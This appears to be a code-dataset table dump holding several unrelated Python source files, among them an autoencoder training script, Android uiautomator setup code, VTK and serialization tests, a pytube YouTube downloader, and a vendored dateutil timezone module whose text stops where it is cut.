max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
---|---|---|---|---|---|---|
analysis/networks/autoencoder/train_eval.py | nriesterer/iccm-neural-bound | 0 | 3300 | <filename>analysis/networks/autoencoder/train_eval.py
""" Evaluates the training performance of the autoencoder.
"""
import time
import pandas as pd
import numpy as np
import torch
import torch.optim as optim
import torch.nn as nn
import ccobra
import onehot
import autoencoder
# General settings
training_datafile = '../../data/Ragni-train.csv'
test_datafile = '../../data/Ragni-test.csv'
n_epochs = 150
batch_size = 16
net = autoencoder.DenoisingAutoencoder()
criterion = nn.MSELoss()
optimizer = optim.Adam(net.parameters())
def csv_to_tensor(datafile):
profiles = []
response_dicts = []
task_sequences = []
df = pd.read_csv(datafile)
for _, subj_df in df.groupby('id'):
# Obtain the task-response mapping for all syllogisms
response_dict = {}
task_sequence = []
for _, task_series in subj_df.sort_values('sequence').iterrows():
item = ccobra.Item(
task_series['id'], task_series['domain'], task_series['task'],
task_series['response_type'], task_series['choices'], task_series['sequence'])
syllogism = ccobra.syllogistic.Syllogism(item)
response_dict[syllogism.encoded_task] = syllogism.encode_response(
task_series['response'].split(';'))
task_sequence.append(syllogism.encoded_task)
# Convert the task-response mapping to the reasoner profile
profile = []
for task in ccobra.syllogistic.SYLLOGISMS:
profile.append(onehot.onehot_response(response_dict[task]))
profiles.append(profile)
response_dicts.append(response_dict)
task_sequences.append(task_sequence)
profile_tensor = torch.tensor(profiles).float().view(-1, 576)
return profile_tensor, np.array(response_dicts), np.array(task_sequences)
# Construct the training and test tensors
train_data, train_resp_dicts, train_seqs = csv_to_tensor(training_datafile)
test_data, test_resp_dicts, test_seqs = csv_to_tensor(test_datafile)
def compute_accuracy(data, resp_dicts, seqs):
accs = []
for subj_idx in range(len(data)):
subj_resp_dict = resp_dicts[subj_idx]
subj_seq = seqs[subj_idx]
profile_tensor = torch.zeros((576)).float()
subj_hits = []
for task in subj_seq:
task_idx = ccobra.syllogistic.SYLLOGISMS.index(task)
start = task_idx * 9
end = start + 9
truth = subj_resp_dict[task]
# Query the network for a prediction
prediction_idx = net(profile_tensor)[start:end].argmax()
prediction = ccobra.syllogistic.RESPONSES[prediction_idx]
subj_hits.append(prediction == truth)
# Add the true response to the profile
profile_tensor[start:end] = torch.from_numpy(onehot.onehot_response(truth))
accs.append(subj_hits)
return accs
# Training loop
train_accs = []
test_accs = []
losses = []
for epoch in range(n_epochs):
start_time = time.time()
# Permute the training data
rnd_idxs = np.random.permutation(np.arange(len(train_data)))
train_data = train_data[rnd_idxs]
train_resp_dicts = train_resp_dicts[rnd_idxs]
train_seqs = train_seqs[rnd_idxs]
batch_losses = []
for batch_idx in range(len(train_data) // batch_size):
# Obtain the batch data
start = batch_idx * batch_size
end = start + batch_size
batch_data = train_data[start:end]
input_data = batch_data
# Augment the input data by adding noise
noise = torch.bernoulli(torch.zeros_like(input_data) + 0.8)
input_data = input_data * noise
# Perform the training
outputs = net(input_data)
loss = criterion(outputs, batch_data)
optimizer.zero_grad()
loss.backward()
optimizer.step()
batch_losses.append(loss.item())
losses.append(np.mean(batch_losses))
# Compute the accuracies for evaluation
net.eval()
# Compute the overall accuracy on the training dataset
train_acc = compute_accuracy(train_data, train_resp_dicts, train_seqs)
test_acc = compute_accuracy(test_data, test_resp_dicts, test_seqs)
# Diagnostig output
print('Epoch {}/{} ({:.2f}s): {}'.format(
epoch + 1, n_epochs, time.time() - start_time, np.mean(batch_losses)))
print(' train acc: {:.4f} ({:.4f})'.format(np.mean(train_acc), np.std(train_acc)))
print(' test acc : {:.4f} ({:.4f})'.format(np.mean(test_acc), np.std(test_acc)))
# Store the accuracy results
train_accs.append(train_acc)
test_accs.append(test_acc)
# Write the accuracies to disk
print('Writing the results to disk...')
np.save('train_accs.npy', np.array(train_accs))
np.save('test_accs.npy', np.array(test_accs))
np.save('train_losses.npy', np.array(losses))
| 2.59375 | 3 |
Tools/GAutomator/wpyscripts/uiautomator/uiautomator_manager.py | Aver58/ColaFrameWork | 1 | 3301 | #-*- coding: UTF-8 -*-
"""
Tencent is pleased to support the open source community by making GAutomator available.
Copyright (C) 2016 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
"""
__author__ = 'minhuaxu <EMAIL>'
import time
import os
import logging
from libs.uiauto.uiautomator import AutomatorDevice
from wpyscripts.common.adb_process import AdbTool
logger=logging.getLogger("wetest")
_device_port=9008
_uiautomator_port = os.environ.get("UIAUTOMATOR_PORT","19008")
def _init_uiautomator():
"""
初始化uiautomator
:return:
"""
file_path = os.path.split(os.path.realpath(__file__))[0]
uiautomator_stub_path = os.path.abspath(
os.path.join(file_path, "..","third","libs","uiAutomator","uiautomator-stub.jar"))
adb=AdbTool()
print(adb.cmd_wait("push",uiautomator_stub_path,"/data/local/tmp"))
logger.debug("Start UIAutomator")
uiautomator_process=adb.cmd("shell","uiautomator","runtest","uiautomator-stub.jar","-c","com.github.uiautomatorstub.Stub")
time.sleep(3)
logger.debug("Exit uiautomator")
adb.forward(_uiautomator_port,_device_port)
def _init():
port = os.environ.get("UIAUTOMATORPORT")
if port:
return int(port)
else:
"""
本地,初始化UiAutomator
"""
_init_uiautomator()
return int(_uiautomator_port)
def get_uiautomator():
if get_uiautomator.instance:
return get_uiautomator.instance
else:
port=_init()
get_uiautomator.instance = AutomatorDevice(None, port, os.environ.get("PLATFORM_IP", "127.0.0.1"), None)
return get_uiautomator.instance
get_uiautomator.instance=None
| 2.078125 | 2 |
IMU/VTK-6.2.0/Filters/Core/Testing/Python/TestSynchronizedTemplates3D.py | timkrentz/SunTracker | 0 | 3302 | <gh_stars>0
#!/usr/bin/env python
import vtk
from vtk.test import Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
class TestSynchronizedTemplates3D(Testing.vtkTest):
def testAll(self):
reader = vtk.vtkImageReader()
reader.SetDataByteOrderToLittleEndian()
reader.SetDataExtent(0,63,0,63,1,93)
reader.SetDataSpacing(3.2,3.2,1.5)
reader.SetFilePrefix("" + str(VTK_DATA_ROOT) + "/Data/headsq/quarter")
reader.SetDataMask(0x7fff)
# write isosurface to file
#vtkSynchronizedTemplates3D stemp
stemp = vtk.vtkContourFilter()
stemp.SetInputConnection(reader.GetOutputPort())
stemp.SetValue(0,1150)
stemp.GenerateTrianglesOff()
stemp.Update()
self.failUnlessEqual(stemp.GetOutputDataObject(0).GetNumberOfPoints(),39315)
self.failUnlessEqual(stemp.GetOutputDataObject(0).GetNumberOfCells(),38380)
stemp.GenerateTrianglesOn()
stemp.Update()
self.failUnlessEqual(stemp.GetOutputDataObject(0).GetNumberOfPoints(),39315)
self.failUnlessEqual(stemp.GetOutputDataObject(0).GetNumberOfCells(),78268)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(stemp.GetOutputPort())
mapper.ScalarVisibilityOff()
head = vtk.vtkActor()
head.SetMapper(mapper)
head.GetProperty().SetColor(1,0.7,0.6)
# Create the RenderWindow, Renderer and Interactor
#
ren1 = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren1)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# Add the actors to the renderer, set the background and size
#
ren1.AddActor(head)
ren1.SetBackground(1,1,1)
renWin.SetSize(400,400)
ren1.SetBackground(0.5,0.5,0.6)
ren1.GetActiveCamera().SetPosition(99.8847,537.926,15)
ren1.GetActiveCamera().SetFocalPoint(99.8847,109.81,15)
ren1.GetActiveCamera().SetViewAngle(20)
ren1.GetActiveCamera().SetViewUp(0,0,-1)
ren1.ResetCameraClippingRange()
# render the image
#
renWin.Render()
# prevent the tk window from showing up then start the event loop
# --- end of script --
if __name__ == "__main__":
Testing.main([(TestSynchronizedTemplates3D, 'test')])
| 1.921875 | 2 |
deserialize/__init__.py | iAndriy/deserialize | 0 | 3303 | """A module for deserializing data to Python objects."""
# pylint: disable=unidiomatic-typecheck
# pylint: disable=protected-access
# pylint: disable=too-many-branches
# pylint: disable=wildcard-import
import enum
import functools
import typing
from typing import Any, Callable, Dict, List, Optional, Union
from deserialize.conversions import camel_case, pascal_case
from deserialize.decorators import constructed, _call_constructed
from deserialize.decorators import default, _get_default, _has_default
from deserialize.decorators import (
downcast_field,
_get_downcast_field,
downcast_identifier,
_get_downcast_class,
allow_downcast_fallback,
_allows_downcast_fallback,
)
from deserialize.decorators import ignore, _should_ignore
from deserialize.decorators import key, _get_key
from deserialize.decorators import parser, _get_parser
from deserialize.decorators import auto_snake, _uses_auto_snake
from deserialize.decorators import allow_unhandled, _should_allow_unhandled
from deserialize.exceptions import (
DeserializeException,
InvalidBaseTypeException,
NoDefaultSpecifiedException,
UndefinedDowncastException,
UnhandledFieldException,
)
from deserialize.type_checks import *
class RawStorageMode(enum.Enum):
"""The storage mode for the raw data on each object.
If a store mode is set, the data will be stored in the attribute named:
`__deserialize_raw__`
"""
# Do not store the raw data at all
none = "none"
# Only store the data on the root node
root = "root"
# Store on all objects (WARNING: This can use a significant amount of memory)
all = "all"
def child_mode(self) -> "RawStorageMode":
"""Determine the mode for child parsing.
When we move to the next child iteration, we need to change mode
in some cases. For instance, if we only store the root node, then we
need to set all the children to not be stored.
:raises Exception: If we get an unexpected storage mode
:returns: The child raw storage mode
"""
if self == RawStorageMode.none:
return RawStorageMode.none
if self == RawStorageMode.root:
return RawStorageMode.none
if self == RawStorageMode.all:
return RawStorageMode.all
raise DeserializeException(f"Unexpected raw storage mode: {self}")
# pylint: disable=function-redefined
def deserialize(class_reference, data, *, throw_on_unhandled: bool = False, raw_storage_mode: RawStorageMode = RawStorageMode.none): # type: ignore
"""Deserialize data to a Python object."""
if not isinstance(data, dict) and not isinstance(data, list):
raise InvalidBaseTypeException(
"Only lists and dictionaries are supported as base raw data types"
)
if hasattr(class_reference, "__name__"):
name = class_reference.__name__
else:
name = str(class_reference)
return _deserialize(
class_reference,
data,
name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode,
)
# pylint: enable=function-redefined
# pylint:disable=too-many-return-statements
def _deserialize(
class_reference, data, debug_name, *, throw_on_unhandled: bool, raw_storage_mode: RawStorageMode
):
"""Deserialize data to a Python object, but allow base types"""
# In here we try and use some "heuristics" to deserialize. We have 2 main
# options to do this. For the first, we can take the expected type and try
# and deserialize the data to that and show any errors. The other option is
# to take the data, and try and determine the types and deserialize that
# way. We do a mix of both.
#
# For example, we check if we have an any type or None type first and return
# early, since we can't deserialize directly to those (since that doesn't
# make any sense). But then later, we can't go for a list directly to a
# type, so we have to go through each item in the data, and iterate.
#
# This produces quite a complex interweaving of operations. The general
# approach I've found to work is to try and do specific type checks first,
# then handle collection data, then any other types afterwards. That's not
# set in stone though.
def finalize(value: Optional[Any]) -> Optional[Any]:
"""Run through any finalization steps before returning the value."""
# Set raw data where applicable
if raw_storage_mode in [RawStorageMode.root, RawStorageMode.all]:
# We can't set attributes on primitive types
if hasattr(value, "__dict__"):
setattr(value, "__deserialize_raw__", data)
return value
if class_reference == Any:
return finalize(data)
# Check if it's None (since things like Union[int, Optional[str]] become
# Union[int, str, None] so we end up iterating against it)
if class_reference == type(None) and data is None:
return finalize(None)
if is_union(class_reference):
valid_types = union_types(class_reference, debug_name)
exceptions = []
for valid_type in valid_types:
try:
return finalize(
_deserialize(
valid_type,
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
)
except DeserializeException as ex:
exceptions.append(str(ex))
exception_message = (
f"Cannot deserialize '{type(data)}' to '{class_reference}' for '{debug_name}' ->"
)
for exception in exceptions:
exception_lines = exception.split("\n")
sub_message = f"\n\t* {exception_lines[0]}"
for line in exception_lines[1:]:
sub_message += f"\n\t{line}"
exception_message += sub_message
raise DeserializeException(exception_message)
if isinstance(data, dict):
return finalize(
_deserialize_dict(
class_reference,
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode,
)
)
if isinstance(data, list):
return finalize(
_deserialize_list(
class_reference,
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode,
)
)
if not is_typing_type(class_reference) and issubclass(class_reference, enum.Enum):
try:
return finalize(class_reference(data))
# pylint:disable=bare-except
except:
enum_by_name = getattr(class_reference, str(data), None)
if enum_by_name:
return finalize(enum_by_name)
# pylint:enable=bare-except
# This will be handled at the end
pass
# If we still have a type from the typing module, we don't know how to
# handle it
if is_typing_type(class_reference):
# The data should not be None if we have a type that got here. Optionals
# are handled by unions above, so if we are here, it's a non-optional
# type and therefore should not be None.
if data is None:
raise DeserializeException(
f"No value for '{debug_name}'. Expected value of type '{class_reference}'"
)
raise DeserializeException(
f"Unsupported deserialization type: {class_reference} for {debug_name}"
)
# Whatever we have left now is either correct, or invalid
if isinstance(data, class_reference):
return finalize(data)
raise DeserializeException(
f"Cannot deserialize '{type(data)}' to '{class_reference}' for '{debug_name}'"
)
# pylint:enable=too-many-return-statements
def _deserialize_list(
class_reference,
list_data,
debug_name,
*,
throw_on_unhandled: bool,
raw_storage_mode: RawStorageMode,
):
if not isinstance(list_data, list):
raise DeserializeException(
f"Cannot deserialize '{type(list_data)}' as a list for {debug_name}."
)
if not is_list(class_reference):
raise DeserializeException(
f"Cannot deserialize a list to '{class_reference}' for {debug_name}"
)
list_content_type_value = list_content_type(class_reference, debug_name)
output = []
for index, item in enumerate(list_data):
deserialized = _deserialize(
list_content_type_value,
item,
f"{debug_name}[{index}]",
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
output.append(deserialized)
return output
def _deserialize_dict(
class_reference, data, debug_name, *, throw_on_unhandled: bool, raw_storage_mode: RawStorageMode
):
"""Deserialize a dictionary to a Python object."""
# Check if we are doing a straightforward dictionary parse first, or if it
# has to be deserialized
remaining_properties = set(data.keys())
if not isinstance(data, dict):
raise DeserializeException(
f"Data was not dict for instance: {class_reference} for {debug_name}"
)
if is_dict(class_reference):
if class_reference is dict:
# If types of dictionary entries are not defined, do not deserialize
return data
key_type, value_type = dict_content_types(class_reference, debug_name)
result = {}
for dict_key, dict_value in data.items():
if key_type != Any and not isinstance(dict_key, key_type):
raise DeserializeException(
f"Could not deserialize key {dict_key} to type {key_type} for {debug_name}"
)
result[dict_key] = _deserialize(
value_type,
dict_value,
f"{debug_name}.{dict_key}",
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
remaining_properties.remove(dict_key)
if throw_on_unhandled and len(remaining_properties) > 0:
raise UnhandledFieldException(
f"The following field was unhandled: {list(remaining_properties)[0]} for {debug_name}"
)
return result
# It wasn't a straight forward dictionary, so we are in deserialize mode
class_instance = None
class_reference_downcast_field = _get_downcast_field(class_reference)
if class_reference_downcast_field:
downcast_value = data[class_reference_downcast_field]
new_reference = _get_downcast_class(class_reference, downcast_value)
if new_reference is None:
if _allows_downcast_fallback(class_reference):
return _deserialize(
Dict[Any, Any],
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
raise UndefinedDowncastException(
f"Could not find subclass of {class_reference} with downcast identifier '{downcast_value}' for {debug_name}"
)
class_reference = new_reference
class_instance = class_reference.__new__(class_reference)
handled_fields = set()
hints = typing.get_type_hints(class_reference)
if len(hints) == 0:
raise DeserializeException(
f"Could not deserialize {data} into {class_reference} due to lack of type hints ({debug_name})"
)
for attribute_name, attribute_type in hints.items():
if _should_ignore(class_reference, attribute_name):
continue
property_key = _get_key(class_reference, attribute_name)
parser_function = _get_parser(class_reference, property_key)
if is_classvar(attribute_type):
if property_key in data:
raise DeserializeException(
f"ClassVars cannot be set: {debug_name}.{attribute_name}"
)
continue
if _uses_auto_snake(class_reference) and attribute_name.lower() != attribute_name:
raise DeserializeException(
f"When using auto_snake, all properties must be snake cased. Error on: {debug_name}.{attribute_name}"
)
using_default = False
if property_key in data:
value = data[property_key]
handled_fields.add(property_key)
property_value = parser_function(value)
elif _uses_auto_snake(class_reference) and camel_case(property_key) in data:
value = data[camel_case(property_key)]
handled_fields.add(camel_case(property_key))
property_value = parser_function(value)
elif _uses_auto_snake(class_reference) and pascal_case(property_key) in data:
value = data[pascal_case(property_key)]
handled_fields.add(pascal_case(property_key))
property_value = parser_function(value)
else:
if _has_default(class_reference, attribute_name):
deserialized_value = _get_default(class_reference, attribute_name)
using_default = True
else:
if not is_union(attribute_type) or type(None) not in union_types(
attribute_type, debug_name
):
raise DeserializeException(
f"Unexpected missing value for: {debug_name}.{attribute_name}"
)
property_value = parser_function(None)
if not using_default:
deserialized_value = _deserialize(
attribute_type,
property_value,
f"{debug_name}.{attribute_name}",
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
setattr(class_instance, attribute_name, deserialized_value)
unhandled = set(data.keys()) - handled_fields
if throw_on_unhandled and len(unhandled) > 0:
filtered_unhandled = [
key for key in unhandled if not _should_allow_unhandled(class_reference, key)
]
if len(filtered_unhandled) > 0:
raise UnhandledFieldException(
f"Unhandled field: {list(filtered_unhandled)[0]} for {debug_name}"
)
_call_constructed(class_reference, class_instance)
return class_instance
| 2.421875 | 2 |
tests/test_get_set.py | snoopyjc/ssf | 3 | 3304 | from ssf import SSF
ssf = SSF(errors='raise')
def test_get_set_days():
dn = ssf.get_day_names()
assert isinstance(dn, tuple)
assert dn == (('Mon', 'Monday'),
('Tue', 'Tuesday'),
('Wed', 'Wednesday'),
('Thu', 'Thursday'),
('Fri', 'Friday'),
('Sat', 'Saturday'),
('Sun', 'Sunday'))
ssf.set_day_names([['MO', 'MON'],
('TU', 'TUE'), ['WE', 'WED'],
('TH', 'THU'), ['FR', 'FRI'],
('SA', 'SAT'), ['SU', 'SUN']])
assert ssf.format('ddd dddd', '10/3/2020') == 'SA SAT'
assert ssf.format('ddd dddd', '10/4/2020') == 'SU SUN'
assert ssf.format('ddd dddd', '10/5/2020') == 'MO MON'
assert ssf.format('ddd dddd', '10/6/2020') == 'TU TUE'
assert ssf.format('ddd dddd', '10/7/2020') == 'WE WED'
assert ssf.format('ddd dddd', '10/8/2020') == 'TH THU'
assert ssf.format('ddd dddd', '10/9/2020') == 'FR FRI'
try:
ssf.set_day_names(2)
assert False # Failed
except ValueError:
pass
try:
ssf.set_day_names((1, 2, 3, 4, 5, 6, 7))
assert False # Failed
except ValueError:
pass
def test_get_set_months():
mn = ssf.get_month_names()
assert isinstance(mn, tuple)
assert mn == (None, ('J', 'Jan', 'January'), ('F', 'Feb', 'February'), ('M', 'Mar', 'March'),
('A', 'Apr', 'April'), ('M', 'May', 'May'), ('J', 'Jun', 'June'), ('J', 'Jul', 'July'),
('A', 'Aug', 'August'), ('S', 'Sep', 'September'), ('O', 'Oct', 'October'),
('N', 'Nov', 'November'), ('D', 'Dec', 'December'))
ssf.set_month_names(mn[:-1] + (('X', 'DE', 'DEC'),) )
assert ssf.format('mmmmm mmm mmmm', '12/3/2020') == 'X DE DEC'
try:
ssf.set_month_names(2)
assert False # Failed
except ValueError:
pass
try:
ssf.set_month_names((0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12))
assert False # Failed
except ValueError:
pass
def test_get_load_table():
t = ssf.get_table()
assert t[0] == 'General'
assert t[1] == '0'
assert t[14] == 'm/d/yyyy'
assert t[49] == '@'
ssf.load_table({104:'yyyy-mm-dd', 105:'0.0'})
assert ssf.format(104, '10/6/2020') == '2020-10-06'
assert ssf.format(105, 3.4) == '3.4'
assert ssf.load('0') == 1
assert ssf.load('mmm mmmm') == 5 # Will be inserted at 5
assert ssf.load('@') == 49
assert ssf.format(5, '10/6/2020') == 'Oct October'
| 2.625 | 3 |
script.py | devppratik/Youtube-Downloader | 0 | 3305 | <filename>script.py<gh_stars>0
import os
import pyfiglet
from pytube import YouTube, Playlist
file_size = 0
folder_name = ""
# Progress Bar
def print_progress_bar(iteration, total, prefix='', suffix='', decimals=1, length=100, fill='#', print_end="\r"):
percent = ("{0:." + str(decimals) + "f}").format(100 *
(iteration / float(total)))
filled_length = int(length * iteration // total)
bar = fill * filled_length + '-' * (length - filled_length)
print(f'\r{prefix} |{bar}| {percent}% {suffix}', end=print_end)
if iteration == total:
print()
# Show Progress Bar
def show_progress_bar(chunk, file_handle, bytes_remaining):
print_progress_bar(file_size - bytes_remaining, file_size, prefix='Progress:', suffix='Complete', length=50)
return
# Get Download Location
def get_download_location():
if os.name == 'nt':
download_location = os.path.join(os.path.expanduser('~'), 'Downloads')
else:
download_location = os.path.join(
os.path.expanduser('~'), 'Downloads')
return download_location
# Get Desired Resolution
def get_resolution(video_url):
yt_obj = YouTube(video_url, on_progress_callback=show_progress_bar)
filters = yt_obj.streams.filter(progressive=True, file_extension='mp4')
print("\nAvailable Resolutions -")
for num, res in enumerate(filters, start=1):
print("\t{}. {}".format(num, str(res.resolution)))
selected_res = int(input('Please enter desired resolution : '))
filters = filters[selected_res - 1]
return filters
# Single Video Download
def download_video():
global file_size
try:
video_url = input('Provide Video Download Link : ')
filters = get_resolution(video_url)
file_size = int(filters.filesize)
download_location = get_download_location()
print("\nDownloading {}".format(str(filters.title)))
filters.download(output_path=download_location)
print("Video Downloaded. Thanks for using!!\nYou can find the video here - {}".format(download_location))
except Exception as e:
print("Some Error occured. Exception message is : ", e)
# Playlist Single Video Download
def download_playlist_video(video_url, res):
global file_size
yt_obj = YouTube(video_url, on_progress_callback=show_progress_bar)
filters = yt_obj.streams.filter(progressive=True, file_extension='mp4', resolution=res).first()
file_size = int(filters.filesize)
if not filters:
filters = yt_obj.streams.filter(
progressive=True, file_extension='mp4').first()
print("\nDownloading {}".format(str(filters.title)))
download_location = get_download_location()
filters.download(output_path="{}/{}".format(download_location, folder_name))
print("Download Complete")
# Playlist Download
def download_playlist():
global folder_name
try:
playlist_url = input('Provide Playlist Link : ')
videos_list = Playlist(playlist_url)
folder_name = videos_list.title
resolution = get_resolution(videos_list[0]).resolution
for video in videos_list:
download_playlist_video(video, resolution)
print("All Videos Downloaded. Thanks for Using!!")
except Exception as e:
print("Some Error occurred. Exception message is : ", e)
# Main Function
def main():
ascii_banner = pyfiglet.figlet_format("YT Downloader")
print(ascii_banner)
print("\t By <NAME>\n\n")
choice = int(input(
"""MENU
1.Download Single Video
2.Download Playlist\n
Enter Your Choice : """))
if choice == 1:
download_video()
elif choice == 2:
download_playlist()
else:
print("Wrong Option")
# Start of Program
if __name__ == '__main__':
main()
| 2.921875 | 3 |
test/python/test.py | alex952/cdr | 0 | 3306 | #
# Copyright 2014-2018 Neueda Ltd.
#
from cdr import Cdr
import unittest
field1 = 1
field2 = 2
field3 = 55
class TestCdr(unittest.TestCase):
def get_a_cdr(self):
d = Cdr()
d.setInteger(field1, 123)
d.setString(field2, "Hello")
d.setString(field3, "World")
return d
def test_set_integer(self):
d = self.get_a_cdr()
self.assertEqual(d.getInt32(field1), 123)
def test_set_string(self):
d = self.get_a_cdr()
d.setString(field2, "Hello")
self.assertEqual(d.getString(field2), "Hello")
def test_get_exception(self):
d = self.get_a_cdr()
with self.assertRaises(RuntimeError):
d.getInteger(4)
def test_to_string(self):
d = Cdr()
d.setInteger(field1, 123)
self.assertEqual(d.toString(), "1=123")
def test_str(self):
d = Cdr()
d.setInteger(field1, 123)
def test_nested(self):
d = Cdr()
e = Cdr()
e.setString(1, "hello")
e.setString(2, "world")
d.appendArray(1, e)
f = d.getArray(1)
self.assertEqual(e.getString(1), f[0].getString(1))
self.assertEqual(e.getString(2), f[0].getString(2))
def test_to_python_dict(self):
d = Cdr()
e = Cdr()
f = Cdr()
f[21] = 400
e[11] = 300
e[12] = [f]
d[1] = 100
d[2] = 200
d[3] = [e]
assert(d.toPythonDict()[3][0][12][0][21] == 400)
if __name__ == '__main__':
unittest.main()
| 3.359375 | 3 |
vendor/mo_times/vendor/dateutil/tz.py | klahnakoski/auth0-api | 0 | 3307 | <gh_stars>0
"""
Copyright (c) 2003-2007 <NAME> <<EMAIL>>
This module offers extensions to the standard Python
datetime module.
"""
import datetime
import os
import struct
import sys
import time
from mo_future import PY3, string_types
__license__ = "Simplified BSD"
__all__ = ["tzutc", "tzoffset", "tzlocal", "tzfile", "tzrange",
"tzstr", "tzical", "tzwin", "tzwinlocal", "gettz"]
relativedelta = None
parser = None
rrule = None
try:
from dateutil.tzwin import tzwin, tzwinlocal
except (ImportError, OSError):
tzwin, tzwinlocal = None, None
def tzname_in_python2(myfunc):
"""Change unicode output into bytestrings in Python 2
tzname() API changed in Python 3. It used to return bytes, but was changed
to unicode strings
"""
def inner_func(*args, **kwargs):
if PY3:
return myfunc(*args, **kwargs)
else:
return myfunc(*args, **kwargs).encode()
return inner_func
ZERO = datetime.timedelta(0)
EPOCHORDINAL = datetime.datetime.utcfromtimestamp(0).toordinal()
class tzutc(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
def dst(self, dt):
return ZERO
@tzname_in_python2
def tzname(self, dt):
return "UTC"
def __eq__(self, other):
return (isinstance(other, tzutc) or
(isinstance(other, tzoffset) and other._offset == ZERO))
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s()" % self.__class__.__name__
__reduce__ = object.__reduce__
class tzoffset(datetime.tzinfo):
def __init__(self, name, offset):
self._name = name
self._offset = datetime.timedelta(seconds=offset)
def utcoffset(self, dt):
return self._offset
def dst(self, dt):
return ZERO
@tzname_in_python2
def tzname(self, dt):
return self._name
def __eq__(self, other):
return (isinstance(other, tzoffset) and
self._offset == other._offset)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s(%s, %s)" % (self.__class__.__name__,
repr(self._name),
self._offset.days*86400+self._offset.seconds)
__reduce__ = object.__reduce__
class tzlocal(datetime.tzinfo):
_std_offset = datetime.timedelta(seconds=-time.timezone)
if time.daylight:
_dst_offset = datetime.timedelta(seconds=-time.altzone)
else:
_dst_offset = _std_offset
def utcoffset(self, dt):
if self._isdst(dt):
return self._dst_offset
else:
return self._std_offset
def dst(self, dt):
if self._isdst(dt):
return self._dst_offset-self._std_offset
else:
return ZERO
@tzname_in_python2
def tzname(self, dt):
return time.tzname[self._isdst(dt)]
def _isdst(self, dt):
# We can't use mktime here. It is unstable when deciding if
# the hour near to a change is DST or not.
#
# timestamp = time.mktime((dt.year, dt.month, dt.day, dt.hour,
# dt.minute, dt.second, dt.weekday(), 0, -1))
# return time.localtime(timestamp).tm_isdst
#
# The code above yields the following result:
#
#>>> import tz, datetime
#>>> t = tz.tzlocal()
#>>> datetime.datetime(2003,2,15,23,tzinfo=t).tzname()
#'BRDT'
#>>> datetime.datetime(2003,2,16,0,tzinfo=t).tzname()
#'BRST'
#>>> datetime.datetime(2003,2,15,23,tzinfo=t).tzname()
#'BRST'
#>>> datetime.datetime(2003,2,15,22,tzinfo=t).tzname()
#'BRDT'
#>>> datetime.datetime(2003,2,15,23,tzinfo=t).tzname()
#'BRDT'
#
# Here is a more stable implementation:
#
timestamp = ((dt.toordinal() - EPOCHORDINAL) * 86400
+ dt.hour * 3600
+ dt.minute * 60
+ dt.second)
return time.localtime(timestamp+time.timezone).tm_isdst
def __eq__(self, other):
if not isinstance(other, tzlocal):
return False
return (self._std_offset == other._std_offset and
self._dst_offset == other._dst_offset)
return True
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s()" % self.__class__.__name__
__reduce__ = object.__reduce__
class _ttinfo(object):
__slots__ = ["offset", "delta", "isdst", "abbr", "isstd", "isgmt"]
def __init__(self):
for attr in self.__slots__:
setattr(self, attr, None)
def __repr__(self):
l = []
for attr in self.__slots__:
value = getattr(self, attr)
if value is not None:
l.append("%s=%s" % (attr, repr(value)))
return "%s(%s)" % (self.__class__.__name__, ", ".join(l))
def __eq__(self, other):
if not isinstance(other, _ttinfo):
return False
return (self.offset == other.offset and
self.delta == other.delta and
self.isdst == other.isdst and
self.abbr == other.abbr and
self.isstd == other.isstd and
self.isgmt == other.isgmt)
def __ne__(self, other):
return not self.__eq__(other)
def __getstate__(self):
state = {}
for name in self.__slots__:
state[name] = getattr(self, name, None)
return state
def __setstate__(self, state):
for name in self.__slots__:
if name in state:
setattr(self, name, state[name])
class tzfile(datetime.tzinfo):
# http://www.twinsun.com/tz/tz-link.htm
# ftp://ftp.iana.org/tz/tz*.tar.gz
def __init__(self, fileobj):
if isinstance(fileobj, string_types):
self._filename = fileobj
fileobj = open(fileobj, 'rb')
elif hasattr(fileobj, "name"):
self._filename = fileobj.name
else:
self._filename = repr(fileobj)
# From tzfile(5):
#
# The time zone information files used by tzset(3)
# begin with the magic characters "TZif" to identify
# them as time zone information files, followed by
# sixteen bytes reserved for future use, followed by
# six four-byte values of type long, written in a
# ``standard'' byte order (the high-order byte
# of the value is written first).
if fileobj.read(4).decode() != "TZif":
raise ValueError("magic not found")
fileobj.read(16)
(
# The number of UTC/local indicators stored in the file.
ttisgmtcnt,
# The number of standard/wall indicators stored in the file.
ttisstdcnt,
# The number of leap seconds for which data is
# stored in the file.
leapcnt,
# The number of "transition times" for which data
# is stored in the file.
timecnt,
# The number of "local time types" for which data
# is stored in the file (must not be zero).
typecnt,
# The number of characters of "time zone
# abbreviation strings" stored in the file.
charcnt,
) = struct.unpack(">6l", fileobj.read(24))
